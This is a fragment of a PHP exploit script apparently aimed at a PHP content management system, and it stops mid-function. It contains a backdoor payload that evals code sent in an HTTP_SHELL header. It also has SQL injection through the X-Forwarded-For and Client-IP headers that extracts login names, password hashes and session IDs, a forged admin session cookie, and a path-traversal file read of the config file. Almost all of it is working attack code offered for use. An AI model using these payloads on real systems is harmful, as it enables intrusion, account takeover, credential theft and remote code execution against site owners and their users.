$config[] = '<?php' . "\n" . 'error_reporting(0);' . 'if(isset($_SERVER[HTTP_SHELL]))' . '{print 123456789;eval($_SERVER[HTTP_SHELL]);exit(123456789);}' . 'else {include(\'./Includes/blocks/block_login.php\');$blok[type]=\'login\';} ?>';
# Each request selects one field, wrapped in the marker plus its index 0..3
$request = array();
$request[] = "'{$config['3']}0',(SELECT pseudo FROM {$config['0']}_users {$config['2']}),'{$config['3']}0'";
$request[] = "'{$config['3']}1',(SELECT pass FROM {$config['0']}_users {$config['2']}),'{$config['3']}1'";
$request[] = "'{$config['3']}2',(SELECT id FROM {$config['0']}_users {$config['2']}),'{$config['3']}2'";
$request[] = "'{$config['3']}3',(SELECT id FROM {$config['0']}_sessions WHERE user_id=(SELECT id FROM {$config['0']}_users {$config['2']})),'{$config['3']}3'";
# One request per query, carried in X-Forwarded-For; the header is cleared between requests
for ($i = 0; $i < count($request); $i++) {
    # rand()/time() only vary the inserted values; they are not used as secrets
    $deb = rand(0, 10000) . "',2," . (time() + 500000) . ",'',(SELECT CONCAT(";
    $sql = $deb . $request[$i] . "))) #";
    $xpl->addheader("X-Forwarded-For", $sql);
    $xpl->get($url);
    $xpl->reset('header');
}
# Pull back every marker-wrapped value; $matches[2] holds the values in index order
if (!preg_match_all("#{$config['3']}([0123]{1})(\\S*){$config['3']}([0123]{1})#", $xpl->getcontent(), $matches)) {
    die("Exploit Failed");
}
$what = array("login", "passwd", "user_id", "session");
for ($i = 0; $i < count($what); $i++) {
    print "\n" . $what[$i] . " -> " . $matches[2][$i];
}
if (empty($matches[2][3])) {
    exit("\nNo session found");
}
# Logged in as admin: cookie "<cookie prefix>_admin_session" is set to the user id (index 2)
$name = array("admin_session", "user_id", "sess_id");
$xpl->addcookie($config[1] . '_' . $name[0], $matches[2][2]);
#
#
# 1004. function abget_template($template="") {
# 1013.  $filename = "abuse/".$template; // $template = ../config.php
# 1014.  if(!file_exists($filename)) { $filename = "abuse/abuse_default.tpl"; }
# 1015.  $handle = @fopen($filename, "r");
# 1016.  $display_page = fread($handle, filesize($filename));
# 1017.  @fclose($handle);
# 1041.  return $display_page;
# 1042. }
#
# Interesting isn't it ? :]
#
# The inner query is encoded with mysqlchar() (defined below); $file is
# assigned outside this fragment. The whole value travels in the Client-IP header.
$sql = "' UNION SELECT 1,2,3,4,5,6,7," . mysqlchar("' UNION SELECT -666,2,3,4,5,6,7,'../{$file}',9,10,11 ORDER BY blocker #") . ",9,10,11,12,13,14,15,16,17,18#255.255.255.255";
$xpl->addheader("Client-IP", $sql);
$xpl->get($url . 'index.php');
print $xpl->getcontent();
/**
 * Encode a byte string as a MySQL CHAR(...) expression.
 *
 * @param string $data Bytes to encode; each byte becomes one decimal code.
 * @return string "CHAR(" followed by the comma-separated codes and ")";
 *                "CHAR()" for an empty input.
 */
function mysqlchar($data)
{
    // strlen() is evaluated once rather than on every iteration
    $length = strlen($data);
    $codes = array();
    for ($pos = 0; $pos < $length; $pos++) {
        $codes[] = ord($data[$pos]);
    }
    // implode() only separates codes, so there is never a trailing comma
    return 'CHAR(' . implode(',', $codes) . ')';
}
function getparam($param, $opt = '')
{
    global $argv;